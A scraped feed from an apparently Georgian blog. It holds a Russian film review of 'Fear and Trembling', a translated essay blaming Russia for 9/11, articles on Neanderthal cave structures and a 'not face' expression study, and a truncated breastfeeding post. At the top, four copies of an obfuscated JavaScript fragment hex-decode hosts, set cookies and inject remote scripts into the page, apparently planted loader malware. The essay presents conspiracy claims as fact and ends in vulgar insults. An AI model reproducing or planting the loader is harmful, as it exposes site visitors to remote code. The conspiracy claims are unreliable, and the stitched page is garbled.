// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>

SocietyWorldLifestyle

Японцы против маленькой девушки

$
0
0
Georgian

Люди склонны преувеличивать разницу между разными народами, как доехавшие до соседнего города туристы преувеличивают разницу между ними и местным населением, напирая на то, что "батон"тут называют "булкой". Наверное, акцентируя внимание на таких незначительных вещах, они уверяют себя, что пережили приключение.Я не хочу сказать, что разницы между жителями разных стран нет, это неправда. Но я уверена, что эти различия на определенном уровне развития обязательно преодолеваются. После изучения истории, культуры, искусства, истоков поведения многое, кажущееся вначале удивительным, становится понятным. Проблема понимания между народами действительно существует, но все больше в таком контексте: развитые, не скованные стереотипами люди образуют совершенно новый "народ"внутри вялой массы. У них, этих двух групп, действительно нет практически ничего общего. Это разные виды. Надеюсь, когда-нибудь все умные люди Земли, которые умудряются создавать удивительные вещи даже на этом острове говна, организуют свою Крипту. Но возвращаемся к разнице менталитетов. Многие любят трактовать границу между миропониманием разных наций, народов как непреодолимую, причем с обеих сторон. Т.е. японец не поймет европейца, индиец мексиканца, а зимбабвиец вообще никого. Мне приходилось даже слышать мнение, что русский человек не должен слушать зарубежную музыку, потому что не понимает лежащего за текстом бэкграунда."Страх и трепет"— это фильм о развитии отношений между японцами и бельгийкой, снятый по бестселлеру Амели Нотомб. Главная героиня, Амели, прожила в Японии до пяти лет, но затем уехала в Бельгию, так что является европейской девушкой. Но она продолжала считать Японию своей родиной и очень хотела вернуться, поэтому подготовилась, блестяще выучила японский и поступила на работу в крупную корпорацию "Юмимото". К сожалению, сначала работы переводчика для нее не нашлось, и господин Саито заставлял ее готовить кофе, потом она переворачивала календари, а позже из-за ледяной начальницы Фубуки нескладной гостье из Европы пришлось чистить туалеты. Душераздирающая история про столкновение разных подходов к жизни, принесшая Амели Нотомб Гонкуровскую премию, а Сильвии Тестю — Сезар. Как роман, так и фильм встретили понимание у многих читателей/зрителей, которые проклинали японцев, меня же эта штука так удивила, что я несколько недель размышляла над итоговым впечатлением. Над Амели стоит целая череда начальников — жирный грубиян Омоти, сухой подхалимствующий господин Саито, который заставляет девушку вручную ксерокопировать тома правил спортивного клуба, и роскошная госпожа Фубуки Мори, сдержанная и поразительно красивая. Фубуки улыбается до тех пор, пока начальник соседнего отдела не дает разносящей сотрудникам кофе Амели важное задание. Госпожа Мори никак не может допустить, чтобы растрепанная пришелица получила важную работу, которой другие добиваются годами, и доносит на Амели. Дальше — хуже, и вскоре "дружба"превращается в противостояние.Фильм "Страх и трепет"вызвал у меня неприятное ощущение при том, что книга наблюдательна и достаточно интересна. Режиссер сделал главную героиню слишком взбалмошной и беззащитной, слишком мечтательной. Он оставил происшествия и остроумные пассажи, убрав их трактовку, отчего Амели стала выглядеть добродушной дурой.С другой стороны, на героиню действительно наваливается целый ряд неприятностей — например, ей не дают стоящую работу, заставляя быть обслугой, на нее кричат, она дезориентирована и не знает, у кого просить помощи. Что бы вы сделали в таком случае? Я верю, что 95 процентов людей плюнуло бы и отправилось восвояси, но у Амели есть мечта, ради нее она готова потерпеть и разобраться. По складу характера Амели совсем не подходит для монотонной бухгалтерской работы, а проявить свои прямые таланты ей не дают, задавив внутри серого тела конторы. В этом отношении фильм сделан отлично — в книге Нотомб упоминает, что за пределами работы ее жизнь проходила насыщенно, но в фильме кажется, что ничего кроме офиса не существует. О своем неумении заниматься глупой бумажной работой Амели сообщает с лишней надменностью — при том, что все остальные люди в кабинете занимаются именно этим. Это не добавляет ей любви, к которой девушка стремится. Когда один из японцев решает предложить ей проект, Амели даже не думает слушать его советы, поступая по-своему. Но самый ее отвратительный поступок — это попытка утешить спрятавшуюся после оскорбления босса Фубуки. Это не имеет отношения к западной/восточной морали, а просто результат того, что Амели старается быть добрым доктором там, где это не нужно и опасно.Большой минус фильма в том, что в книжный текст можно вкладывать любые интонации, образ же Сильви Тестю однозначен. Люди вроде кино-Амели раздражают. Они хотят понравиться всем, и это выводит из себя, как прилипающий лист. Японская корпоративная иерархия и деловые отношения вообще — абсолютная кабала, подчинение, но Амели должна была знать, куда идет, и, раз уж ей так хотелось стать японкой, принять правила. В ходе работы на Юмимото она все же понимает, что японкой быть не хочет, потому что быть японкой — это склад "нельзя"и "нужно". Получается, что быть одновременно японкой и европейцем не выходит, что нужно искать людей с другой стороны, которые тоже готовы на контакт.Кино назидательное, хотя кинообраз Амели подействовал на меня, как красная тряпка. Нотомб сняла с Японии флер страны аниме-героев и самураев, превратив ее в нагромождение скучных офисов и замордованных клерков. Ей повезло, и она нашла свое призвание — стала писателем, оставив корпорацию позади.

Авторы:Баисонашвили Мариам

CultureSocietyLifestyle

რუსულ ტერორიზმზე, ძირძველ ივერიელთა სექს-აღტკინებასა და ბათუმის კაშკაშა მზეზე

$
0
0
Georgian

,,საბჭოთა კავშირში სამხედრო შენაერთებსა და სასწავლო დაწესებულებებთან საერთაშორისო ტერორისტების მომზადების მრავალი ცენტრი აღმოცენდა. 1960 წელს მოსკოვში სპეციალურად ,,პატრის ლუმუმბას სახელობის ხალხთა მეგობრობის  უნივერსიტეტიც“ კი შეიქმნა, სადაც ტერორისტებს ამზადებდნენ.

ეს ,,გამოცდილება“ და ტერორიზმის საერთაშორისო ქსელი, რომელიც ,,კგბ“- შექმნა, არ გამქრალა სსრკ-ს დაშლასთან ერთად – დარჩა კადრები, უნარები და კავშირები... ის ამჟამად ახალ ეტაპზე განახლდა, როგორც ომი ამერიკასთან.

არსებობს კითხვები, რომელიც ზედაპირზე დევს და გაკვირვებას იწვევს ის, რომ მათ დღეს არავინ სვამს, როდესაც ტერორიზმის თემა დასავლურ სამყაროში წამყვანი გახდა. პირველი: სად მდებარეობს ტერორიზმის ცენტრი? ვინ ხელმძღვანელობს მას? ვინ მოამზადა და განახორციელა ისეთი რთული დივერსია, როგორც ნიუ- იორკში მსოფლიო სავაჭრო ცენტრის ცათამბრჯენებისა და ვაშინგტონში პენტაგონის შენობის განადგურება იყო? ვინ? ბინ ლადენმა? ეს არასერიოზულად გამოიყურება. ყოველი, ვისაც ანალიზის უნარი გააჩნია, მიხვდება, რომ ამ მასშტაბის ოპერაცია მხოლოდ ერთი ტერორისტული ორგანიზაციის ძალებს ბევრად აღემატება... 11 სექტემბრის დივერსიის შემდეგ აშშ ადვილად ჩაითრიეს ახლო აღმოსავლეთის ორ ომში... დავსვათ კითხვა, ვის ინტერესებს ემსახურებოდა ეს?

11 სექტემბრის დივერსიამ მთელ დასავლურ სამყაროს დაარტყა. არცერთ ქვეყანას ამ აქტის შედეგად არავითარი პოლიტიკური მოგება არ მიუღია. მხოლოდ რუსეთმა ეს სიტუაცია უცებ გამოიყენა, რომ საკუთარი სახელმწიფო ტერორიზმი და ჩეჩნეთში დანაშაულებრივი ომი გადაეფარა, მიუთითა რა, ჩეჩნების ისლამურ რელიგიურობაზე, როდესაც ისინი სამშობლოს იცავდნენ. ეს თავდაცვის უფლება რუსებმა, როგორც ისლამური ტერორიზმი, ისე წარმოაჩინეს. მანიპულაციამ გაამართლა. დასავლეთმა გაყიდა ჩეჩენი ხალხი და გასანადგურებლადაც გაწირა. არც ერაყში ომისგან მიუღია ვინმეს ეკონომუკური სარგებელი, გარდა რუსეთისა.

რუსეთის სპეცსამსახურები ინფორმაციული ყურადღების გადატანის არაადამიანურ საშუალებებს – ტერაქტებს – ხშირად მიმართავენ. პუტინის ,,უხილავი ფრონტის მებრძოლები“ ტერაქტებზე არაერთხელ დაიჭირეს. მაგალითად, მოსკოვსა და ვოლგოდონსკში საცხოვრებელი სახლების აფეთქება (შემდეგ, იგივეს მცდელობა ყაზანში), ჩეჩნეთში ომი რომ გაეჩაღებინათ, ზელიმხან იანდარბიევის მკვლელობა და სხვ.

რუსეთის ,,კგბ“-მ პუტინის ხელისუფლებაში მოსვლასთან ერთად განაახლა საერთაშორისო ტერორისთული ,,საქმიანობა“... მსოფლიო ტერორიზმის მართვას რუსეთიდან დამაჯერებლად (დოკუმენტებით ხელში) ამტკიცებენ რუსული დაზვერვის ყოფილი ფუნქციონერები, რომლებიც დასავლეთში დასახლდნენ, აგრეთვე რუსი ანალიტიკოსები და დისიდენტები (ა.ლიტვინენკო, ვ.ბუკოვსკი და სხვ.).

ბოლოს!

რუსულ-ბელორუსული (იკ. – ქართულ-რუსული – ზ.ო.) სამარადისო ცივილიზაციური ომი დაუსრულებელია, სანამ რუსეთის იმპერია არსებობს. უბრალო ლოგიკა გვკარნახობს – რუსული იმპერია უნდა ლიკვიდირებულ იქნას. მხოლოდ ეს პირობა მისცემს ბელორუსიას (იკ. – საქართველოს – ზ.ო.) თავისუფალი ცხოვრებისა და განვითარების საშუალებას. რუსეთის იმპერიის ლიკვიდაციის ზეამოცანა უნდა გაისისხლხორცოს ბელორუსულმა (იკ. – ქართულმა – ზ.ო.) პოლიტიკამ, ის უნდა გახდეს ბელორუსიის (იკ. – საქართველოს – ზ.ო.) ნაციონალური ინტერესი.

შეაჩერო რუსეთის პოლიტიკური აგრესია – არ ნიშნავს ეომო მას იარაღით, ტანკებითა და თვითმფრინავებით (თუმცა ამისთვის ბელორუსები (იკ. – ქართველები – ზ.ო.) მუდამ მზად უნდა იყვნენ)... რუსული საფრთხე უნდა გახდეს ყოველი ბელორუსის (იკ. – ქართველის – ზ.ო.) ცოდნის სავალდებულო (აუცილებელი) ნაწილი. ბელორუსების გონებაში (იკ. – ქართველების გონებაში – ზ.ო.) თეზისთან ,,მიყვარს ბელორუსია!“ ( იკ. – ,,მიყვარს საქართველო!“ – ზ.ო.) გვერდით უნდა იდგეს გაფრთხილება: ,,უფრთხილდით რუსეთს!“.

 

ზენონ სტანისლავის ძე პოზნიაკი – ბელორუსი პოლიტიკოსი და საზოგადო მოღვაწე, ნაციონალისტი, არქეოლოგი და ხელოვნებათმცოდნე.

 

P.S.

ზემომოყვანილი ზენონ პოზნიაკმა 2006 წლამდე დაწერა, მე კი დღეს დილით ვთარგმნე და, აი, რატომ...

მეგობარმა მომითხრო იმის შესახებ, თუ რა ,,მაგრად გულაობენ“ ქართველი მამრები ბათუმში მასობრივად ჩასულ რუს ნაშებთან ერთად. ბევრს აღარ გავაგრძელებ, მხოლოდ იმას ვიტყვი, რომ ღიპიანი ბიძების ეს სექსუალური აღტკინება ჩემთვის ამაზრზენია. ერთუჯრედიან არსებებთან, ერთი ბოთლი კონიაკისა და მწვადის საფასურად ადვილი სექსი, სხვას ყველაფერს თავი რომ დავანებოთ, დამამცირებელია... ,,პრაშმანდოვკა“ ის ქალი კი არ არის, არამედ თქვენ ხართ – იმას ევასება, ხოლო შენ მონდომებულ ,,მუშაკად“ (იკ. – სირად – ზ.ო.) გიყენებს...  სხვა არავინ არ ,,გაძლევთ“ ხომ, თქვე ბანძებო, მე თქვენი ,,დიშევკა“ ..!

ჰოდა... დამატებით, თქვენთვის, რისი თქმა მინდოდა ყველაზე ძალიან, ამ თბილისური სიცხისგან არ დამავიწყდეს... მაიცათ, კარგად ჩამოვაყალიბო... მაშ ასე! ბათუმის კაშკაშა მზის ქვეშ გათანგულო, სამამულო წარმოების ,,სექს მუშაკებო“, ეს ჩემი ნაწერი მორალის კითხვად არ მიიღოთ – ასქესებულო ,,თანამემამულენო“, უბრალოდ, მძულხართ და გაგინებთ.

ძმურად გამიგეთ ;)

დიდი დიღმის სამხედრო-საზღვაო ფლოტის, მეორე კლასის მატროსი სიურრეალისტი გენადი. 2016, ივნისი

 

 

PoliticsSocietyLifestyleრუსული ტერორიზმისექსიბათუმიზღვა

175000 წლის წინანდელი ნეანდერტალელების იდუმალი ნაგებობები

$
0
0
Georgian

იდუმალებით მოცული ნაგებობები აღმოაჩინეს საფრანგეთში, ერთ–ერთი გამოქვაბულის შიგნით, რომლებსაც ნეანდერტალელთა საქმიანობას მიაწერენ, რომლებიც ამ რეგიონებში 100000 წლით ადრე ცხოვრობდნენ მანამ, სანამ თანამედროვე ადამიანის წინაპარი გამოჩნდა ევროპაში.

  ექსტრაორდინალური ნაგებობები 400 სტალაგმიტისგან შედგება, რომლებიც მიწიდან ამოგლიჯეს და დასტებად დაალაგეს ერთმანეთზე , რათა რუდიმენტული, ჩანასახოვანი კედელი შეექმნათ გამოქვაბულის ნესტიან ნიადაგზე.

  ყველაზე გამორჩეული წყობა კედლებისა გახლავთ ორმაგი შემორგოლილი კედელი, რომელიც ოთხ შრედ არის მოქცეული მიწაში, რომელიც „სოლებით“ არის დამაგრებული, რომლის როლსაც უშუალოდ ვერტიკალურად ჩაჭედებული სტალაგმიტი ასრულებს. ყველაზე დიდი კედელის განი 7 მეტრს ითვლის, რომელიც დღემდე დაუზიანებელია და რომელიც 40 სანტიმეტრი სიმაღლისაა.

  „ ეს ნაგებობები სრულიად განსხვავდება იმისგან, რაც კი ოდესმე გვინახას“ აცხადებს არქეოლოგი მარია სორესი ლეიდენის უნივერსიტეტიდან. ნეანდერტალელთა მიღწევების ისტორიაში უნიკალური შემთხვევა, რაც აქამდე კაცობრიობას აღმოუჩენია.

  კედლის ზოგიერთ ნაწილზე სტალაგმიტები გაშავებული ან გაწითლებულია, რასაც მკვლევარები მიყავს ერთ დასკვნამდე, რომ ნეანდერტალელები ცეცხლლის გამოყენებაში უკვე დაოსტატებულნი იყვნენ და მათ სპეციალურად ამოაშენეს „ბუხრები“, რათა გამოქვაბული გაენათებინათ.

ჯერ კიდევ 90–იან წლებში, როდესაც ამ ადგილას მოხვდნენ,  სტალაგმიტების ნაგებობებს მიიჩნევდნენ სულ რაღაც 50 000 წლისას, იმავე ასაკის, რასაც დამწვარი ცხოველების ნარჩენები ითვლიდნენ , რომლებსაც გამოქვაბულში მიაკვლიეს.

  უახლესმა ტესტირებებმა და გამოკვლევებმა ნაგებობებზე, რომლებიც ჟურნალ „nature”–ში გამოქვეყნდა, გამოააშკარეავეს სიმართლე, რომ  კედლები ბევრად უფრო ძველი იყო, ვიდრე ეგონათ. სტალაგმიტები და დანახშირებული ძვლების ასაკმა, რომლებიც აღმოაჩინეს, 175000 წელი დაითვალა. ფრანგი და ბელგიელი მეცინერებების აზრით, მხოლოდ ნეანდერტალალებს შეეძლოთ ამ ნაგებობის აგება.

  ნეანდერტალალები ცხოვრობდნენ ევრაზიაში 400000–40000 წლის წინ და გადაშენდნენ მას შემდეგ, რაც უშუალოდ თანამედროვე ადამიანის წინაპარის გამოჩნდა. ჩვენი წინაპრები უჩვეულოდ ნიჭიერები გამოდგნენ, რასაც, მათ მიერ  შექმნილი ქვის იარაღები და სხვა აღმოჩენილი არტეფაქტები უსვამს ხაზს. ნეანდერტალელბმა იცოდნენ ცეცხლთან ურთიერთობა, ცხოვრობდნენ თავშესაფრებში, იცვამდნენ ტანსაცმელს და დაეუფლნენ ქვის იარაღის წარმოების ხელოვნებას. ზოგ მკვლევარს მიაჩნია, რომ ისინი თავიანთ გარდაცლილებს მარხავდნენ და არსებობს ეჭვი, რომ საფლავსაც კი რთავდნენ სხვადასხვა საშუალებებით, იქნება ეს ყვავილი თუ სხვა რაიმე მცენარე.

  მაგრამ ეს ყველაფერი არაა, იბერიელი ნეანდერტალელები გამოირჩეოდნენ ზღვის მიმართ სიყვარულით. ისინი მოლუსკებისა და სხვა ნიჟარებისგან ქმნიდნენ სამკაულებს, უკეთებდნენ მოხატულობას რაიმე მინერალური პიგმენტით და შემდეგ ბაწარზე აცვამდნენ.

  ნეანდერტალელები უდავოდ საგმირო ფრონტზე გავიდნენ თავიანთი მიღწევებით, მაგრამ ზოგიერთი მკვლევარისა თუ პროფესორის აზრით, ნაგებობები არ იყო მაინცდამაინც ნეანდერტალელთა ძლიერი მხარე. მაგალითად, როგორც ბორდოს უნივერსიტეტის პროფესორი აცხადებს, ადრეული ადამიანის ჯიში ბევრად უფრო დახვეწილი და განვითარებული იყო ვიდრე თანამედროვე ექსპერტებს მიაჩნიათ. აღმოჩენილი ადგილი უაღრესად კარგად იყო დაკონსერვებული, რადგან  სტალაგმიტები კედლების აშენებისთანავე კალციუმის კარბონატში იყო შეფუთული, ასე რომ არ ყოფილიყო, სვეტები დაიშლებოდა 175000 წლის მანძილზე და დღემდე ვერ მოაღწევდა.

  დღემდე მაინც არავინ იცის ზუსტად, თუ რისთვის არის ეს ნაგებობები შექმნილი, ისიც არ იციან, გამიზნულად არის აშენებული კედლები, თუ არა, მაგრამ ყველაზე მთავარი და დამაინტრიგებელი ისაა, თუ რას საქმიანობდა ნეანდერტალელი ასე ღრმად გამოქვაბულში, მკვლევარები უამრავ კითხვას აწყდებიან.

  

https://www.dailymotion.com/video/x4ceckj_cave-structures-shed-new-light...

 

 

SocietyWorldLifestylehttps://www.dailymotion.com/video/x4ceckj_cave-structures-shed-new-light-on-neanderthals_school

ადამიანის გამომეტყველება-,,არა"- უნივერსალური ნაწილი ყველა ენისა.

$
0
0
Georgian

                                 "Not Face"

ადამიანის სახის გამომეტყველება,ეს არის ერთ-ერთი უტყუარი ნიშანი ზოგადად ამა თუ იმ პიროვნების დასახასიათებლად. როგორც წესი, პირველადი ბუნებრივი რეაქცია ადამიანს სახეზე ეტყობა ხოლმე. შესაბამისად ადამიანთა გამომეტყველების კლასიფიკაციაც საკმაოდ მრავალფეროვანია, თუმცა მინდა დღევანდელ სტატიაში მინდა ვისაუბთო, ერთ-ერთ ყველაზე სპეციფიკურ და გამორჩეულ გამომეტყველებაზე. ეს არის ,,სახე-არა".

ერთ-ერთმა მეცნიერთა გუნდმა , რომელსაც უძღვებოდა ოჰაიოს უნივერსიტეტის შემეცნებითი მკვლევარი პროფესორი ალექს მარტინეზი (Aleix Martinez) ,აღმოაჩინა, რომ უნივერსალური სახის გამომეტყველება, რომელიც ითარგმნება უამრავ კულტურაში ერთნაირად არის- უარყოფითი სახის ემოცია.                                                      ,, ჩვენს ახლანდელ ცოდნაზე დაყრდნობით, ეს არის პირველი მტკიცებულება იმისა, რომ ის ნეგატიური სახის გამომეტყველება, რომელსაც ჩვენ ვიყენებთ დღითი დღე გადაიზარდა ენის უნივერსალურ ნაწილად“ - ამბობს პროფესორი მარტინეზი , რომელიც არის მთავარი ავტორი იმ კვლევისა , რომელიც გამოიცა 2016 წლის მაისში ჟურნალ ,,შემეცნებაში“      ეს ყველაფერი იდენტურად დამტკიცდა ინგლისურ, ესპანურ, მანდარინ-ჩინურ და ამერიკულ ენებზე მოლაპარაკე ადგილობრივ მაცხოვრებლებში, გამოხედვა შემდეგნაირია : შეჭმუხნული წარბები და მოპრუწული ტუჩები და მაღლა აწეული ნიკაპი ,ასე კი იმიტომ ვიქცევით, რომ გამოვხატოთ ჩვენი ნეგატიური დამოკიდებულება , როგორიცაა : ,, არ გეთანხმები“ , მკვლევრები ამას უწოდებენ- ,, სახე-არა“

პროფესორმა მარტინეზმა და მისმა თანა-მეავტორეებმა გამოიყენეს კომპიუტერული ალგორითმი რომ განესაზღვრათ 21 მკაფიო ემოციური გამომეტყველება- მათ შორის კომბინირებულებიც, რომლებიც ძირითადი ემოციების ერთობლიობაა.

,,არა-სახე“შეგდება სამი ძირითადი გამომეტყველებისგან , რომლებიც უნივერსალურად მიღებულია ,,მორალური -არდათანხმების“ აღსანიშნავად : სიბრაზე, სიძულვილი  და ზიზღი.

,,ჩარლზ დარვინსსჯეროდა,რომ იმის უნარი- სანამ განვივითარებდით ლაპარაკის უნარს, გვეურთიერთა ადამიანებს ერთმანეთთან საშიშროების ან აგრესიის გამოხატულების სახით, იყო ერთ-ერთი მთავარი მამოძრავებელი ძალა ადამიანის ფიზიკური გადარჩენისას“ - ამბობს პროფესორი მარტინეზი.

 იმისათვის რომ დაეტესტა მარტინეზის გუნდს ეს ჰიპოთეზა, თვითონ , მათი კოლეგები და 158 სტუდენტი დასხდნენ ციფრული კამერის წინ. ცდის მონაწილეებს გადაუღეს ვიდეო და ფოტოები, როდესაც ისინი ელაპარაკებოდნენ კამერის უკან მდგომ მათსავე ენაზე მოსაუბრე პიროვნებას. მეცნიერები ეძებდნენ ,,გრამატიკულ მიმანიშნებელს“ , იმ სახის ემოციას ,რომელიც განსაზღვრავს გრამატიკულ ფუნქციებს წინადადებაში.

 მაგალითად, წინადადებაში ,, არ მივდივარ წვეულებაზე“ ,გრამატიკული მიმანიშნებელი არის უარყოფა- არა. მის გარეშე წინადადების მნიშვნელობა სავსებით იცვლება. - ,,მე მივდივარ წვეულებაზე“.

თუ გრამატიკული მიმანიშნებელი არის უნივერსალური, მაშინ ყველა მონაწილე მიიღებდა  მსგავსი სახის გამომეტყველებას. ტესტის მიმდინარეობისას მონაწილეებმა დაიმახსოვრეს და წაიკითხეს კიდევაც ის ნეგატიური წინადადებები ,რომლებიც მეცნიერებს წინასწარ ჰქონდათ დაწერილი, ან ისეთი კითხვები რომლებზე პასუხიც თავისთავად გამოხატავდა უარყოფას და უთანხმოებას. მაგალითად : ,, კვლევა აჩვენებს,რომ სწავლის გადასახადი უნდა გაიზარდოს 30 პროცენტით, ეთანხმებით თუ არა? “

მონაწილეების პასუხები კი შემდეგი იყო: ,, ეს არ არის კარგი იდეა“ , ,,მათ ეს არ უნდა გააკეთონ“

79138391

გუნდი დროდადრო უღებდა სურათებს  მოლაპარაკე სტუდენტებს, რათა დაედგნათ რა სახის კუნთები მოძრაობდა და რა მიმართულებით. კომპიუტერულმა ალგორითმა მოიძია ათასობით სახის გამომეყველება, რომელიც ამ ზემოაღნიშნულ გამომეტყველებას ჰგავდა.  სახე ,,არამ“ გამოხატა შემდეგი , შეჭმუხნული წარბები ,,სიბრაზის“ მისათითებლად ასევე წარბები კომბინირებული იყო აწეულ ნიკაპთან ,,სიძულვილის“ მისათითებლად და მოპრუწული ტუჩები ,,ზიზღის“ მისათითებლად.

მიუხედავად ენათა ნაირგვარობისა , ან თუნდაც იმისა, ლაპარაკობდნენ თუ მღერობდნენ ცდის პირები - მათი სახეები აჩვენებდა მსგავს გამომეტყველებას უარყოფითი წინადადებების წარმოთქმისას და მოძრაობდა სახის სამი კუნთი. კვლევა ასევე ცხადყოფს, რომ ჩვენ ყველა ინსტინქტურად გამოვხატავთ სახე ,,არას“ . რაც შეეხება სხვა სახის დამატებით ინფორმაციას, პროფესორმა მარტინეზმა და მისმა თანა-მეავტორეებმა აღმოაჩინეს რომ ამერიკულად მოლაპარაკეთაგან ზოგიერთი ხანდახან ,,არა სახეს“ იღებდა იმის ნაცვლად რომ წარმოეთქვა სიტყვა ,,არა“.

 ეს ექსპერიმენტი გამოდგა ცხადი მაგალითი იმისა, თუ როგორ შეიძლება აღმოჩნდეს ენის რომელიმე კონკრეტული ნაწილის უნივერსალურობის დამადასტურებელი ფაქტი და როგორ აისახება ის ადამიანებზე.

                           shutterstock_363360398

 

 

წყარო : ,, Linguistic Anthropology- Allesandro Duranti ( Second edition)” 

         ,,Universal Grammar and American sign language” 

          http://www.hngn.com/articles/193608/20160330/scientists-discover-univers...            language-facial-expressions-grammar.htm

          http://www.sci-news.com/othersciences/anthropology/not-face-universal-pa...

 

SocietyLifestyle

ძუძუთი კვება- ადამიანთა მასაზრდოებელი საწყისი.

$
0
0
Georgian

 

  ძუძუთი კვება ეს ხომ განსაკუთრებული სიახლოვე და ურთიერთობაა დედასა და ახალშობილს შორის. ეს ბუნების მიერ ბოძებული გამორჩეული და აღმატებული გრძნობაა, რომელიც ამავდროულად უდიდესი პოზიტიური ეფექტის მომხდენია ახალშობილზე. ბავშვის ძუძუზე დამოკიდებულება კი დაბადების პირველივე წუთებიდან იწყება ინსტინქტურად და გრძელდება განსხვავებული პერიოდის განმავლობაში. და კონკრეტულად რაზეა ამის ხანგრძლივობა დამოკიდებული და რამ შეიძლება იმოქმედოს მასზე, ვისაუბრებ ახლა. 

